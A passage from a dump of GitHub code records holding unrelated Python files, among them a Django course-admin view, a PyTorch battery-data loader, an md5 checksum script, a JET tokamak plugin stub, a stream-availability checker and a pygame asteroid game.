ns_weights)\n\n return(retdict)\n","repo_name":"c-d-cotton/calvo-multisector-ss","sub_path":"manysector_ss_func.py","file_name":"manysector_ss_func.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11250624579","text":"from uuid import uuid4\nfrom hashlib import 
sha256\n\nurl_dict = {}\nsalt = uuid4().hex\n\n\ndef cash():\n    url = input('Enter a url: ')\n    if url == 'stop':\n        return url_dict\n\n    hash_url = sha256(url.encode() + salt.encode()).hexdigest()\n\n    if hash_url in url_dict.values():\n        print('This link has already been entered')\n        return cash()\n    else:\n        url_dict[url] = hash_url\n        return cash()\n\n\nprint(cash())\n","repo_name":"Crasow/For_practical","sub_path":"Python_algorithms/OLD/Lesson_3/HW_4.py","file_name":"HW_4.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
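The record above derives one random salt per run and appends it to every URL before hashing. A compact restatement of that pattern as a reusable function (names are illustrative):

from hashlib import sha256
from uuid import uuid4

salt = uuid4().hex  # fresh salt each run, as in the record above

def hash_url(url):
    # same digest for the same url within a run, different across runs
    return sha256(url.encode() + salt.encode()).hexdigest()

assert hash_url('https://example.com') == hash_url('https://example.com')
assert hash_url('https://example.com') != hash_url('https://example.org')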
{"seq_id":"27038917989","text":"import numpy as np\r\nimport pandas as pd\r\nimport torch\r\nfrom torch.utils.data import TensorDataset,DataLoader\r\nfrom Config import get_args\r\nimport os\r\nfrom utils import Scaler\r\n\r\n\r\ndef load_data(args):\r\n\r\n    source_X_files = os.listdir(os.path.join(args.source_dir,'X'))\r\n    source_Y_files = os.listdir(os.path.join(args.source_dir, 'Y'))\r\n\r\n    target_X_files = os.listdir(os.path.join(args.target_dir,'X'))\r\n    target_Y_files = os.listdir(os.path.join(args.target_dir,'Y'))\r\n\r\n    # print(source_X_files)\r\n    # print(source_Y_files)\r\n    # print(target_X_files)\r\n    # print(target_Y_files)\r\n\r\n    ############################\r\n    ####### load source data\r\n    ############################\r\n    Xs_list = []\r\n    Ys_list = []\r\n    for x in source_X_files:\r\n        for y in source_Y_files:\r\n            if x.split('_')[2] == y.split('_')[2]:\r\n                battery_i_data = np.load(os.path.join(args.source_dir,'X',x))\r\n                battery_i_capacity = np.load(os.path.join(args.source_dir,'Y',y))\r\n                Xs_list.append(battery_i_data)\r\n                Ys_list.append(battery_i_capacity)\r\n                break\r\n    source_X = np.concatenate(Xs_list,axis=0)\r\n    source_Y = np.concatenate(Ys_list,axis=0)\r\n    print(f'source: {source_X.shape}, {source_Y.shape}')\r\n\r\n    ############################\r\n    ####### load target data\r\n    ############################\r\n    count = 0\r\n    Xt_list = []\r\n    Yt_list = []\r\n    for x in target_X_files:\r\n        count += 1\r\n        for y in target_Y_files:\r\n            if x.split('_')[2] == y.split('_')[2]:\r\n                if count == args.test_battery_id:\r\n                    target_test_X = np.load(os.path.join(args.target_dir,'X',x))\r\n                    target_test_Y = np.load(os.path.join(args.target_dir, 'Y', y))\r\n                    print(f'target test battery: {x}')\r\n                    continue\r\n\r\n                battery_i_data = np.load(os.path.join(args.target_dir,'X',x))\r\n                battery_i_capacity = np.load(os.path.join(args.target_dir,'Y',y))\r\n                Xt_list.append(battery_i_data)\r\n                Yt_list.append(battery_i_capacity)\r\n                break\r\n    target_train_X = np.concatenate(Xt_list,axis=0)\r\n    target_train_Y = np.concatenate(Yt_list,axis=0)\r\n    print(f'target train: {target_train_X.shape}, {target_train_Y.shape}')\r\n    print(f'target test: {target_test_X.shape}, {target_test_Y.shape}')\r\n\r\n    #######################\r\n    ###### normalization\r\n    #######################\r\n    target_train_x, target_test_x = Scaler(target_train_X, target_test_X).minmax()\r\n    target_train_y, target_test_y = Scaler(target_train_Y, target_test_Y).minmax()\r\n    source_x = Scaler(source_X).minmax()\r\n    source_y = Scaler(source_Y).minmax()\r\n\r\n    target_train_x = torch.from_numpy(np.transpose(target_train_x, (0, 2, 1)))\r\n    target_train_y = torch.from_numpy(target_train_y).view(-1, 1)\r\n    target_test_x = torch.from_numpy(np.transpose(target_test_x, (0, 2, 1)))\r\n    target_test_y = torch.from_numpy(target_test_y).view(-1, 1)\r\n    source_x = torch.from_numpy(np.transpose(source_x, (0, 2, 1)))\r\n    source_y = torch.from_numpy(source_y).view(-1, 1)\r\n\r\n\r\n\r\n    source_loader = DataLoader(TensorDataset(source_x, source_y), batch_size=args.batch_size, shuffle=True,drop_last=True)\r\n    target_train_loader = DataLoader(TensorDataset(target_train_x, target_train_y), batch_size=args.batch_size,shuffle=True,drop_last=True)\r\n    target_valid_loader = DataLoader(TensorDataset(target_train_x, target_train_y), batch_size=args.batch_size,shuffle=False,drop_last=False)\r\n    target_test_loader = DataLoader(TensorDataset(target_test_x, target_test_y), batch_size=args.batch_size,shuffle=False)\r\n    return source_loader, target_train_loader, target_valid_loader,target_test_loader\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    args = get_args()\r\n    source_loader, target_train_loader, target_valid_loader,target_test_loader = load_data(args)\r\n    print(len(source_loader))\r\n    print(len(target_train_loader))\r\n    print(len(target_valid_loader))\r\n    print(len(target_test_loader))","repo_name":"wang-fujin/HATL","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"28879383711","text":"# -*- coding: utf-8 -*-\r\n# @Author: ChenJun\r\n# @Email: chenjun4663@novogene.com\r\n# @Qmail: 1170101471@qq.com\r\n# @Date: 2018-12-27 13:50:49\r\n# @Last Modified by: JUN\r\n# @Last Modified time: 2018-12-28 00:16:06\r\n\r\nimport os\r\nimport time\r\nfrom multiprocessing import Pool\r\nimport argparse\r\n# import sys\r\n# import hashlib\r\n# import datetime\r\n\r\n\r\ndef fargv():\r\n    parser = argparse.ArgumentParser(\r\n        description='Get the md5 value and size of every file under the current folder and write them to new files')\r\n    parser.add_argument('-x', type=int, default=1,\r\n                        help='number of processes for md5 computation, default 1')\r\n    parser.add_argument('-c', '--checksize', action='store_true',\r\n                        help='whether to run in checksize-only mode')\r\n    args = parser.parse_args()\r\n    return args.__dict__\r\n\r\n\r\ndef md5_do(filepath):\r\n    os.system('md5sum \"%s\" >>md5.txt' % filepath)\r\n\r\n\r\ndef do(x, checksize=False):\r\n    t00 = time.time()\r\n\r\n    print('> \\nGetting the paths of all files in the current folder...')\r\n    t0 = time.time()\r\n    # s_files = os.popen(\"\"\"find -L ./ -type f |cat|awk '!/.\\/md5.txt/'|sort\"\"\").read()\r\n    s_files = os.popen(\r\n        \"\"\"find -L ./ -type f|cat|awk '!/.\\/md5.txt/'|awk '!/.\\/checkSize.xls/'\"\"\").read()\r\n    Lfiles = s_files.strip().split('\\n')\r\n    print('Done, took %s seconds' % (time.time() - t0))\r\n\r\n    print('> \\nGetting file sizes...')\r\n    t0 = time.time()\r\n    with open('checkSize.xls', 'w') as fo:\r\n        # fo.write(\r\n        #     '\\t'.join([str(os.path.getsize('./md5.txt')), './md5.txt']) + '\\n')\r\n        for path in Lfiles:\r\n            fo.write('\\t'.join([str(os.path.getsize(path)), path]) + '\\n')\r\n    print('Done, took %s seconds' % (time.time() - t0))\r\n    os.system('sort -k2 checkSize.xls -o checkSize.xls')\r\n    print('Sorting done, took %s seconds' % (time.time() - t0))\r\n    print('Finished, checkSize.xls written to the current folder, took %s seconds' % (time.time() - t00))\r\n\r\n    if not checksize:\r\n        print('> \\nComputing md5 values of all files with %s processes...' % x)\r\n        os.system('>md5.txt')\r\n        t0 = time.time()\r\n        p = Pool(x)\r\n        for path in Lfiles:\r\n            # md5_do(path)\r\n            p.apply_async(md5_do, args=(path,))\r\n        p.close()\r\n        p.join()\r\n        print('Computation done, took %s seconds' % (time.time() - t0))\r\n\r\n        print('> \\nSorting md5.txt and checkSize.xls...')\r\n        t0 = time.time()\r\n        os.system('sort -k2 md5.txt -o md5.txt')\r\n        print('Sorting done, took %s seconds' % (time.time() - t0))\r\n        print('Finished, md5.txt written to the current folder, took %s seconds' % (time.time() - t00))\r\n\r\n\r\ndef main():\r\n    kwargs = fargv()\r\n    # print(kwargs)\r\n    # print(*list(kwargs.keys()),sep=\", \")\r\n    do(**kwargs)\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n\r\n\r\n# def GetFileMd5(filename):\r\n#     pass\r\n    # On Linux this ran about 1.2x slower, so this function was abandoned\r\n    # if not os.path.isfile(filename):\r\n    #     return\r\n    # myhash = hashlib.md5()\r\n    # f = open(filename, 'rb')\r\n    # while True:\r\n    #     # b = f.read(8096)\r\n    #     b = f.read(40960)\r\n    #     if not b:\r\n    #         break\r\n    #     myhash.update(b)\r\n    # f.close()\r\n    # return myhash.hexdigest()\r\n","repo_name":"wan230114/mytools","sub_path":"tools_jiqun/md5.py","file_name":"md5.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
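The md5 script above shells out to md5sum, and its commented-out GetFileMd5 sketches a pure-Python route. A hedged version of that alternative, chunked hashing fanned out over a process pool (file list and pool size are placeholders):

import hashlib
from multiprocessing import Pool

def file_md5(path, chunk_size=65536):
    # read in fixed-size chunks so large files never sit wholly in memory
    digest = hashlib.md5()
    with open(path, 'rb') as f:
        for block in iter(lambda: f.read(chunk_size), b''):
            digest.update(block)
    return digest.hexdigest(), path

if __name__ == '__main__':
    paths = ['a.bin', 'b.bin']  # placeholder paths
    with Pool(4) as pool:
        for md5, path in pool.map(file_md5, paths):
            print(md5, path)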
{"seq_id":"4802699960","text":"from django.shortcuts import render\nfrom .models import Course, UserCourse, UserCentre\nfrom btbadmin.models import Centre\nfrom django.http import HttpResponseRedirect\nfrom django.utils import timezone\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom pullingapp import settings\nfrom send_email.views import send_email\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.sites.shortcuts import get_current_site\n\n\n@login_required(login_url=settings.LOGIN_URL)\n@user_passes_test(lambda u: u.groups.filter(name='domain_admins').exists())\ndef domain_admin_home(request):\n    current_user = request.user\n    current_user_id = current_user.id\n    user_centre = UserCentre.objects.get(user_id=current_user_id)\n\n    delete_course = request.POST.get('delete_course')\n    if delete_course:\n        course = Course.objects.get(id=delete_course)\n        course.delete()\n        return HttpResponseRedirect(reverse('domain_admin_home'))\n\n    add_new_course = request.POST.get('add_new_course')\n    if add_new_course == \"new_course\":\n        course_code = request.POST.get('course_code')\n        course_title = request.POST.get('course_title')\n        course_start_date = request.POST.get('course_start_date')\n        course = Course(code=course_code, title=course_title, start_date=course_start_date, status=0, centre_id=user_centre.centre_id, created_date=timezone.now(), 
updated_date=timezone.now())\n        course.save()\n        return HttpResponseRedirect(reverse('domain_admin_home'))\n\n    courses = Course.objects.filter(centre_id=user_centre.centre_id)\n    return render(\n        request,\n        'domain_admin/domain_admin.html',\n        {\n            'title': 'Edit course',\n            'courses': courses,\n        }\n    )\n\n\n@login_required(login_url=settings.LOGIN_URL)\n@user_passes_test(lambda u: u.groups.filter(name='domain_admins').exists())\ndef edit_course(request, course_id):\n    message = \"\"\n    message_class = \"\"\n    course_message = \"\"\n\n    update_course = request.POST.get('update_course')\n    course_title = request.POST.get('course_title')\n    course_status = request.POST.get('course_status')\n    if update_course:\n        course = Course.objects.get(id=update_course)\n        course.title = course_title\n        course.status = course_status\n        try:\n            course.save()\n            message_class = \"success\"\n            course_message = \"Course updated successfully!\"\n        except Exception:\n            message_class = \"error\"\n            course_message = \"There was an error when updating the course.\"\n\n    remove_course_user_id = request.POST.get('remove_user')\n    if remove_course_user_id:\n        course_user = UserCourse.objects.get(course_id=course_id, user_id=remove_course_user_id)\n        course_user.delete()\n\n    new_course_user = request.POST.get('add_user_to_course')\n    if new_course_user == 'add_new_course_user':\n        course_user = request.POST.get('add_course_user')\n        # check if user is already on a course\n        user_on_course = UserCourse.objects.filter(user_id=course_user)\n        if user_on_course.count() > 0:\n            message = \"User is already enrolled on a course\"\n            message_class = \"error-message\"\n        else:\n            user_course = UserCourse(user_id=course_user, course_id=course_id, status=1, created_date=timezone.now(), updated_date=timezone.now())\n            user_course.save()\n            message = str(user_course.user.first_name) + \" has been added successfully\"\n            message_class = \"success-message\"\n\n    # get centre from user through UserCentre object\n    user_centre = Centre.objects.get(course__id=course_id)\n    # Get course object from parsed course_id\n    course = Course.objects.get(id=course_id)\n\n    # Get course users\n    course_users = UserCourse.objects.filter(course_id=course_id)\n    course_users_filter = UserCourse.objects.filter(course_id=course_id).values('user_id')\n\n    # Get all centre users\n    all_centre_users = UserCentre.objects.filter(centre_id=user_centre)\n    all_centre_users_filter = UserCentre.objects.filter(centre_id=user_centre)\n\n    invite_user_email = request.POST.get('invite_user_email')\n    invite_user_first_name = request.POST.get('invite_user_first_name')\n    current_site = get_current_site(request)\n    register_url = current_site.domain + reverse(\"register\")\n\n    if settings.EMAIL_USE_SSL is True:\n        hypertext = \"https://\"\n    else:\n        hypertext = \"http://\"\n\n    ctx = {}\n    ctx[\"first_name\"] = invite_user_first_name\n    ctx[\"centre_name\"] = user_centre.name\n    ctx[\"course_name\"] = course.title\n    ctx[\"register_url\"] = hypertext + current_site.domain + reverse(\"register\")\n\n    emails = (invite_user_email,)\n    if invite_user_email:\n        send_email(request, \"course_invitation\", ctx, emails)\n\n    try:\n        available_centre_users = all_centre_users.exclude(user_id__in=course_users_filter)\n    except ValueError:\n        available_centre_users = None\n\n    return render(\n        request,\n        'domain_admin/edit_course.html',\n        {\n            'title': 'Edit course',\n            'course': course,\n            'course_users': course_users,\n            'centre': user_centre,\n            'available_centre_users': available_centre_users,\n            'message': message,\n            'course_message': course_message,\n            'message_class': message_class\n        }\n    )\n\n","repo_name":"alastairwp/yourvoteapp","sub_path":"domain_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
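The timezone.now() calls above matter because Django only resolves a bare callable when it is a field default; a value assigned to an instance is stored as-is, so passing the function object instead of its result is a bug. The difference in plain Python:

from datetime import datetime

stored_wrong = datetime.utcnow    # the function object itself
stored_right = datetime.utcnow()  # a concrete datetime

assert callable(stored_wrong)
assert isinstance(stored_right, datetime)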
{"seq_id":"17413379676","text":"# -*- coding: future_fstrings -*-\n\"\"\"JET specific plugin functions for FIRE.\n\nFunctions and top level variables in this file with appropriate names will be imported and used by FIRE to provide\nfunctionality and information specific to this machine.\n\nThe most important role of the machine plugin is to provide a means of looking up the tile surface 's' coordinate\nagainst which heat flux profiles etc are defined. Additional machine specific information and tools include\nidentifying sector numbers and other location based labels and plotting methods for visualising this information.\n\nAuthor: Tom Farley (tom.farley@ukaea.uk)\nCreated: 05-05-2020\n\"\"\"\nimport logging\n\nimport numpy as np\nfrom fire.plotting.plot_tools import create_poloidal_cross_section_figure\nfrom fire.geometry.s_coordinate import interpolate_rz_coords, separate_rz_points_top_bottom, get_nearest_rz_coordinates, get_nearest_boundary_coordinates\n\nfrom fire.geometry.geometry import cartesian_to_toroidal\n\nlogger = logging.getLogger(__name__)\n# logger.setLevel(logging.DEBUG)\n\n# ===================== PLUGIN MODULE ATTRIBUTES =====================\n# Required: Name of plugin module (typically name of machine == name of file), needed to be located as a plugin module\nmachine_plugin_name = 'jet'\n\n# Recommended\nmachine_name = 'JET' # Will be cast to lower case (and '-' -> '_') in FIRE\nplugin_info = {'description': 'This plugin supplies functions for JET specific operations/information'} # extra info\nlocation_labels_im = ['sector', 's_global'] # Parameters used to label coordinates across the whole image\n\n# Optional/other\nn_sectors = 8 # Used internally in funcs below\nfirst_sector_start_angle = 90 # TODO: Check\nsectors_clockwise = True # TODO: Check\n# Machine specific\nn_louvres_per_sector = 1 # TODO: Check\n\n# Boxes to pass to fire.s_coordinate.remove_false_rz_surfaces\nfalse_rz_surface_boxes_default = []\ns_start_coord_default = (0, 0)\n\n# Use same plugin funcs for machine sector and s_path coordinate as for MAST\nfrom fire.plugins.machine_plugins.tokamak_utils import get_s_coord_path\nfrom fire.plugins.machine_plugins.jet_tools.scoord import get_s_definition\n\n# See bottom of file for function aliases\n# ====================================================================\n\nmodule_default = object()\n\ndef get_wall_rz_coords(wall):\n    # Load the S coordinate definition.\n    s, sR, sZ = get_s_definition(wall)\n    return sR, sZ\n\ndef get_s_coord_global(x_im, y_im, z_im, **kwargs):\n    \"\"\"Return JET tile s coordinates for all pixels in image.\n\n    This 's' coordinate is considered 'global' as it is predefined for all (R, Z) surfaces as opposed to a 'local' s\n    starting at 0m along a specific path.\n\n    Args:\n        x_im        : x coordinates of each pixel in image\n        y_im        : y coordinates of each pixel in image\n        z_im        : z coordinates of each pixel in image\n        **kwargs    : Arguments passed to ...\n\n    Returns: JET tile 's' coordinate for each pixel in the image\n\n    \"\"\"\n    logger.warning(f'\\n\\nUsing incorrect JET divertor \"s\" coordinates - NOT IMPLEMENTED\\n\\n')\n\n    r_im, phi_im, theta_im = cartesian_to_toroidal(x_im, y_im, z_im)\n    s_im = r_im\n    return s_im\n\ndef get_jet_wall_coords(shot=50000, 
ds=None):\n \"\"\"Return (R, Z) coordinates of points defining wall outline of tile surfaces\n\n This is normally safe to call with default arguments.\n\n Args:\n shot: Shot number to get wall definition for\n\n Returns: Tuple of (R, Z) coordinate arrays\n\n \"\"\"\n raise NotImplementedError\n if ds is not None:\n r, z = interpolate_rz_coords(r, z, ds=ds, false_surface_boxes=false_rz_surface_boxes_default)\n return r, z\n\ndef get_tile_edge_coords_jet(shot=50000, subset=True):\n \"\"\"Return (R,Z) coords of main tile boundaries\n\n Args:\n shot: Shot number to get wall definition for\n\n Returns: Tuple of (R, Z) coordinate arrays\n\n \"\"\"\n raise NotImplementedError\n\n return r_tiles, z_tiles\n\ndef get_nearest_s_coordinates_jet(r, z, tol=5e-3, ds=1e-3, shot=50000):\n \"\"\"Return closest tile surface 's' coordinates for supplied (R, Z) coordinates\n\n Args:\n r: Array of radial R coordinates\n z: Array of vertical Z coordinates\n tol: Tolerance distance for points from wall - return nans if further away than tolerance\n ds: Resolution to interpolate wall coordinate spacing to in meters\n no_cal: Whether to use idealised CAD coordinates without spatial calibration corrections\n signal: UDA signal for wall coords\n shot: Shot number to get wall definition for\n\n Returns: Dict of s coordinates for top/bottom, (Array of 1/-1s for top/bottom of machine, Dict keying 1/-1 to s\n keys)\n\n \"\"\"\n raise NotImplementedError\n return s, (position, table_key)\n\n\n\ndef plot_vessel_outline_jet(ax=None, top=True, bottom=True, shot=50000, no_cal=False, aspect='equal', ax_labels=True,\n axes_off=False, show=True, **kwargs):\n import matplotlib.pyplot as plt\n raise NotImplementedError\n return fig, ax\n\n\ndef format_coord(coord, **kwargs):\n \"\"\"\n MAST-U coordinate formatter, includes sector number.\n\n Args:\n coord: Array of (x, y, z) coordinates describing a point in the machine\n\n Returns: String describing the position of the point within the machine\n\n \"\"\"\n x, y, z = coord[0], coord[1], coord[2]\n r, phi = cartesian_to_toroidal(x, y)\n\n sector = get_machine_sector(phi)\n\n formatted_coord = 'X,Y,Z: ( {:.3f} m , {:.3f} m , {:.3f} m )'.format(x, y, z)\n formatted_coord = formatted_coord + u'\\nR,Z,\\u03d5: ( {:.3f} m , {:.3f}m , {:.1f}\\xb0 )'.format(r, z, phi)\n formatted_coord = formatted_coord + '\\n Sector {:.0f}'.format(sector)\n\n return formatted_coord\n\ndef get_machine_sector(x, y, z=None):\n from fire.plugins.machine_plugins.tokamak_utils import (get_machine_sector)\n\n out = get_machine_sector(x, y, z=z, n_sectors=n_sectors, first_sector_start_angle=first_sector_start_angle,\n clockwise=sectors_clockwise)\n return out\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n pass","repo_name":"TomFarley/air","sub_path":"fire/plugins/machine_plugins/jet.py","file_name":"jet.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70592321080","text":"class Solution:\n def rotate(self, matrix: list[list[int]]) -> None:\n bound0 = 0\n bound1 = len(matrix) - 1\n \n while bound0 < bound1:\n pivots = [\n [bound0, bound0],\n [bound0, bound1],\n [bound1, bound1],\n [bound1, bound0],\n ]\n for i in range(bound1 - bound0):\n tmp = matrix[pivots[3][0]][pivots[3][1]]\n for k in range(3, 0, -1):\n matrix[pivots[k][0]][pivots[k][1]] = matrix[pivots[k - 1][0]][pivots[k - 1][1]]\n matrix[pivots[0][0]][pivots[0][1]] = tmp\n\n pivots[0][1] += 1\n pivots[1][0] += 1\n pivots[2][1] -= 
1\n                pivots[3][0] -= 1\n\n            bound0 += 1\n            bound1 -= 1","repo_name":"chehsunliu/a","sub_path":"LeetCode/0048_rotate-image/20220526.py","file_name":"20220526.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16023149948","text":"import urllib3\npack1=( 'ABC DEF GHI' )\n\npack_var=pack1.split(\" \")\n\nbusss_pack2=('JKL MNO PQR ')\n\npack2=busss_pack2.split(\" \")\n\n\nsss_pack1=('WXY ZWA MMM')\n\nssss_pack1=sss_pack1.split(\" \")\n\nips={'z.z.z.z', 'w.w.w.w'}\n\ndef south_channels():\n    print('checking %d eeee pack1 channels in streamers' % len(pack_var))\n    for vvv_channels in pack_var:\n        for ip in ips:\n            connection = urllib3.PoolManager()\n\n            url=('%s:8006/Live/%s/STB.m3u8' % (ip,vvv_channels))\n            r=connection.request(\"GET\", url)\n            #print(r.status)\n            if r.status != 200:\n                print('%s channel had a problem connecting' % vvv_channels)\n\n\ndef my_channels():\n    print('checking %d dddd pack1 channels in streamers' % len(pack2))\n    for vvv_channels_1 in pack2:\n        for ip in ips:\n            connection = urllib3.PoolManager()\n            url=('%s:8006/Live/%s/STB.m3u8' % (ip,vvv_channels_1))\n            r=connection.request(\"GET\", url)\n            #print(r.status)\n            if r.status != 200:\n                print('%s channel had a problem connecting' % vvv_channels_1 )\n\ndef my_channels2():\n    print('checking %d cccc pack2 channels in streamers' % len(ssss_pack1))\n    for bu_channels_2 in ssss_pack1:\n        for ip in ips:\n            connection = urllib3.PoolManager()\n\n            url=('%s:8006/Live/%s/STB.m3u8' % (ip,bu_channels_2))\n            r=connection.request(\"GET\", url)\n            if r.status != 200:\n                print('%s channel had a problem connecting' % bu_channels_2)\n\n#\n#south_channels()\n#my_channels()\n#my_channels2()\n","repo_name":"Vasanth3g/python-test","sub_path":"streamer_verification.py","file_name":"streamer_verification.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
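The layer-by-layer rotation in the rotate-image record above has a shorter transpose-then-reverse equivalent; a sketch with a sanity check:

def rotate(matrix):
    n = len(matrix)
    # transpose in place, then reverse each row: one 90-degree clockwise turn
    for i in range(n):
        for j in range(i + 1, n):
            matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]
    for row in matrix:
        row.reverse()

m = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
rotate(m)
assert m == [[7, 4, 1], [8, 5, 2], [9, 6, 3]]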
{"seq_id":"42284006100","text":"import subprocess\nimport os\nimport time\nimport sys\nimport psutil\nimport argparse\n\n# https://manpages.ubuntu.com/manpages/focal/en/man1/pngcrush.1.html\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n    '--selected_folders',\n    '--folder',\n    '--folders',\n    action = 'extend',\n    nargs = '+',\n    type = str,\n    metavar = 'models/',\n    help = 'List of folders with subfolders to convert.'\n)\n\nparser.add_argument(\n    '--rootonly',\n    '--root',\n    action = 'store_true',\n    help = 'Just convert files in the root of the working directory.'\n)\n\nargs = parser.parse_args()\nselectedFolders = args.selected_folders\nrootOnly = args.rootonly\n\nallFiles = []\n\nrecursive = False\nverbose = True\n\nPNGCRUSH_ARGS = ['-brute', '-ow', '-rem', 'alla', '-m', '7', 'filename']\ninputFile = '.png'\n\ndef convertFolders(folders):\n    if recursive:\n        for folder in folders:\n            if not os.path.exists(folder):\n                continue\n            for root, _, files in os.walk(folder):\n                for file in files:\n                    if not file.endswith(inputFile): # Input file\n                        if verbose:\n                            print(\"Skipping %s\" % file)\n                        continue\n                    if verbose:\n                        print(\"Adding %s\" % file)\n                    file = os.path.join(root, file)\n                    allFiles.append(file)\n    else:\n        for file in os.listdir('.'):\n            if not file.endswith(inputFile):\n                if verbose:\n                    print(\"Skipping %s\" % file)\n                continue\n            if verbose:\n                print(\"Adding in %s\" % file)\n            allFiles.append(file)\n    for file in allFiles:\n        PNGCRUSH_ARGS[6] = file\n        subprocess.run(['pngcrush'] + PNGCRUSH_ARGS)\n\ndef convertRoot():\n    if recursive:\n        for root, _, files in os.walk('.'):\n            for file in files:\n                if not file.endswith(inputFile): # Input file\n                    if verbose:\n                        print(\"Skipping %s\" % file)\n                    continue\n                if verbose:\n                    print(\"Adding %s\" % file)\n                file = os.path.join(root, file)\n                allFiles.append(file)\n    else:\n        for file in os.listdir('.'):\n            if not file.endswith(inputFile):\n                if verbose:\n                    print(\"Skipping %s\" % file)\n                continue\n            if verbose:\n                print(\"Adding in %s\" % file)\n            allFiles.append(file)\n    for file in allFiles:\n        PNGCRUSH_ARGS[6] = file\n        subprocess.run(['pngcrush'] + PNGCRUSH_ARGS)\n\n\nif selectedFolders:\n    convertFolders(selectedFolders)\nelif rootOnly:\n    convertRoot()\n","repo_name":"loonaticx/sketches","sub_path":"scripts/HardCrusher/Crush.py","file_name":"Crush.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"44022308220","text":"import sys\nfrom collections import deque, Counter, defaultdict\n\ninput = sys.stdin.readline\nMOD = (10**9+7)\n\ndef factorization(n):\n    arr = []\n    temp = n\n    for i in range(2, int(-(-n**0.5//1))+1):\n        if temp%i==0:\n            cnt=0\n            while temp%i==0:\n                cnt+=1\n                temp //= i\n            arr.append([i, cnt])\n    if temp!=1:\n        arr.append([temp, 1])\n    if arr==[]:\n        arr.append([n, 1])\n    return arr\n\n\ndef pow_k1(x, n):\n    if n == 0:\n        return 1\n    K = 1\n    while n > 1:\n        if n % 2 != 0:\n            K *= x\n        x *= x\n        n //= 2\n    return K * x\n\n\ndef pow_k(x, n):\n    if n == 0:\n        return 1\n    K = 1\n    while n > 1:\n        if n % 2 != 0:\n            K *= x\n        x *= x\n        n //= 2\n        x%=MOD\n    return K * x\n\n\ndef main():\n    n = int(input())\n    al = list(map(int, input().split())) \n    lcm_dic = defaultdict(int)\n    for a in al:\n        fac = factorization(a)\n        for f in fac:\n            lcm_dic[f[0]] = max(f[1], lcm_dic[f[0]])\n\n\n    lcm = 1\n    for prime, cnt in lcm_dic.items():\n        lcm *= pow_k1(prime,cnt)\n\n    \n    ans = 0\n    for a in al:\n        ans += (lcm//a)%MOD\n        # if ans >= MOD: ans%=MOD\n        ans%=MOD\n\n    print(ans)\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"nami4mo/competitive-programming-problems","sub_path":"practice/abc126-211/abc152_e.py","file_name":"abc152_e.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
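pow_k in the record above is square-and-multiply exponentiation with a running modulus; Python's three-argument pow computes the same thing and makes a handy cross-check:

MOD = 10 ** 9 + 7

def pow_mod(x, n, mod=MOD):
    # square-and-multiply: O(log n) steps, reducing mod at each one
    result = 1
    x %= mod
    while n > 0:
        if n & 1:
            result = result * x % mod
        x = x * x % mod
        n >>= 1
    return result

assert pow_mod(3, 45) == pow(3, 45, MOD)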
self.player.velocity[1] = 0\n\n        # Horizontal axis (x)\n        if keys[pygame.K_d] or keys[pygame.K_RIGHT]:\n            self.player.velocity[0] = 1\n        elif keys[pygame.K_q] or keys[pygame.K_LEFT]:\n            self.player.velocity[0] = -1\n        else:\n            self.player.velocity[0] = 0\n\n        if keys[pygame.K_ESCAPE]:\n            # leave the main loop cleanly; pygame.quit() runs after run() returns\n            self.running = False\n\n    def update(self):\n        self.player.move()\n        self.asteroid.move()\n\n        if self.asteroid.pos_asteroid.colliderect(self.player.rect):\n            self.nb_run_game = 1\n            self.run_game = False\n\n    def text(self):\n        self.global_font = pygame.font.SysFont('Courier New', 20)\n\n        self.title_font = pygame.font.SysFont('Courier New', 45)\n        self.title_text = self.title_font.render('SpaceShooter', 1, WHITE)\n\n        self.begin_font = pygame.font.SysFont('Courier New', 20)\n        self.begin_text = self.begin_font.render('Press \"enter\" to begin', 1, WHITE)\n\n        self.lose_font = pygame.font.SysFont('Courier New', 25)\n        self.lose_text = self.lose_font.render(('You survived :'), 1, WHITE)\n        self.lose_text_2 = self.lose_font.render((str(round((self.seconds / 60), 2)) + ' seconds' ), 1, WHITE)\n\n        self.retry_font = pygame.font.SysFont('Courier New', 20)\n        self.retry_text = self.retry_font.render('Press \"enter\" to retry', 1, WHITE)\n\n    def display(self):\n        self.surface.fill(BLACK)\n\n        #Keep the player inside the screen\n        self.player.rect.clamp_ip(self.zone)\n\n        #Draw the entities\n        self.asteroid.draw(self.surface)\n        self.player.draw(self.surface)\n\n\n        pygame.draw.rect(self.surface, BLACK, self.zone, 1)\n\n        if self.run_game == False and self.nb_run_game == 0:\n            surface.blit(self.title_text, (40, 200))\n            surface.blit(self.begin_text, (60, 350))\n\n        if self.run_game == False and self.nb_run_game > 0:\n            surface.blit(self.lose_text, (75, 200))\n            surface.blit(self.lose_text_2, (120, 250))\n            surface.blit(self.retry_text, 